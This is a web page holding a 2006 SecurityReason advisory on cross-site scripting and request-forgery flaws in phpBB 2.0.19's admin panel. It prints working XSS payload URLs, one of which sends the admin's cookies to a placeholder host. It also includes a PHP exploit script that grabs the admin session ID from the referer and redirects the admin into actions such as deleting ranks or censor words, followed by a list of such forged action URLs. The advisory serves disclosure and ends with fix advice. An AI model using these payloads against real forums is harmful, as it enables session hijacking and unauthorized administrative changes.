Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityReason Advisory

  Topic : phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
  SecurityAlert : 31
  CVE : CVE-2006-0437
  CVE : CVE-2006-0438
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : Yes
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Maksymilian Arciemowicz
  Date : 03.02.2006

  Affected Software : phpBB 2.0.19 and prior

  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 3.2.2006
from SecurityReason.Com
CVE-2006-0437 for the XSS issues
CVE-2006-0438 for the CSRF issues


- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open
Source bulletin board package. phpBB has a

user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS admin ---
In admin/admin_smilies.php you can create, modifcate smille. So nothing
special but phpBB don't check what is going to db.

case savenew

- -448-473---
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ?
$HTTP_POST_VARS['smile_code'] :

$HTTP_GET_VARS['smile_code'];
$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ?
$HTTP_POST_VARS['smile_url'] :

$HTTP_GET_VARS['smile_url'];
$smile_url = phpbb_ltrim(basename($smile_url), "'");
$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?

$HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];
$smile_code = trim($smile_code);
$smile_url = trim($smile_url);
$smile_emotion = trim($smile_emotion);

// If no code was entered complain ...
if ($smile_code == '' || $smile_url == '')
{
message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
}

//
// Convert < and > to proper htmlentities for parsing.
//
$smile_code = str_replace('<', '&lt;', $smile_code);
$smile_code = str_replace('>', '&gt;', $smile_code);

//
// Save the data to the smiley table.
//
$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url,
emoticon)
VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" .
str_replace("\'", "''",

$smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
$result = $db->sql_query($sql);
- -448-473---

Only "<" and ">" are restricted.

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&
smile_url=icon_mrgreen.gif&smile_emotion=c"
onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&
smile_url=icon_mrgreen.gif"%20onmouseover='alert("SecurityReason.Com")'%
20&sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&
smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http
://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN

and you have new smile. Ofcourse you can better do exploit. For IE and
etc.


- --- 2. Cross Site Request Forgeries ---
phpBB admin in Administration Panel have SID in url. Ok. Example if you
want see user profil or split, lock someone

post etc.

Like:
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7e
c505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec59
00fed3b35
etc.

If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON
then you can create url to script with referer for admin.So when admin
open profil the url will be executed. Need be referer in request.

Next problem is:

103# if ( !preg_match("#^((ht|f)tp://)([^
\?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|png))$)#is", $avatar_filename) )

in includes/unsercp_avatar.php.

Why? Because this preg() don't have limit of chars.
In mysql phpbb DB you have (*_users)

user_avatar varchar(100)

only 100 chars will go to db.
So you can post url like

http://[HOST]/[DIR]/script.php/[100 chars].jpg

Sent:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreaso
nsecurityreasonsecurityreasonsecur.jpg

and in db is:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreaso
nsecurityreasonsecurityreasonsecur

or in bbcode (IMG)

http://[HOST]/[DIR]/script.php/securityreason.jpg

Nothing special.. Ok..

You need create new user (nick name can be "FUCKmeADMIN" etc). And
upload one script. Doesn't need be in serverwhere is phpbb.

- -script.php--
<?php
# SecurityReason.Com writed by Maksymilian Arciemowicz
# Example exploit

$operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smi
le_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityR
eason.Com)\'%20'; #
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_ur
l=icon_mrgreen.gif" onmouseover='alert(document.cookie)'

$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);

if($sid[1]!=''){
header("Location: ".$operation."&sid=".$sid[1]);
}

?>
- -script.php--

In this script you need give someone operation. I think, can be:

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&
smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'
%20
create new smilie.. and all char a, change to image with javascript
(XSS).

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=delete&id=63
Delete someone smile.

http://[HOST]/[DIR]/admin/admin_words.php?mode=delete&id=1&sid=c1db64124
b7ced0668dec5900fed3b35
Delete word censor.

http://[HOST]/[DIR]/admin/admin_forums.php?mode=forum_order&move=15&f=4
Change position of forum=4.

http://[HOST]/[DIR]/admin/admin_ranks.php?mode=delete&id=4
Delete Rank Administration

http://[HOST]/[DIR]/login.php?logout=true
Logout

etc..

If admin have in url SID and img tag is displaying that this script can
get SID form HTTP_REFERER and redirect tooperation for admin
(header("Location...")).
Admin can't see result. This XSS in Point 1 can you used for this
trick.

Solution is don't displaying <IMG> tags from user where have you SID in
url. And use POST to any operations like create, remove smilies etc.

- --- 3. Greets ---
sp3x

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot]
com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFD41JC3Ke13X/fTO4RAhpsAJ46jnHCF0c9RROYPC1T88N9D/iOigCgwKUV
3YyVMR1NFsznOmjVpv6LVAc=
=b2mM
-----END PGP SIGNATURE-----

Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.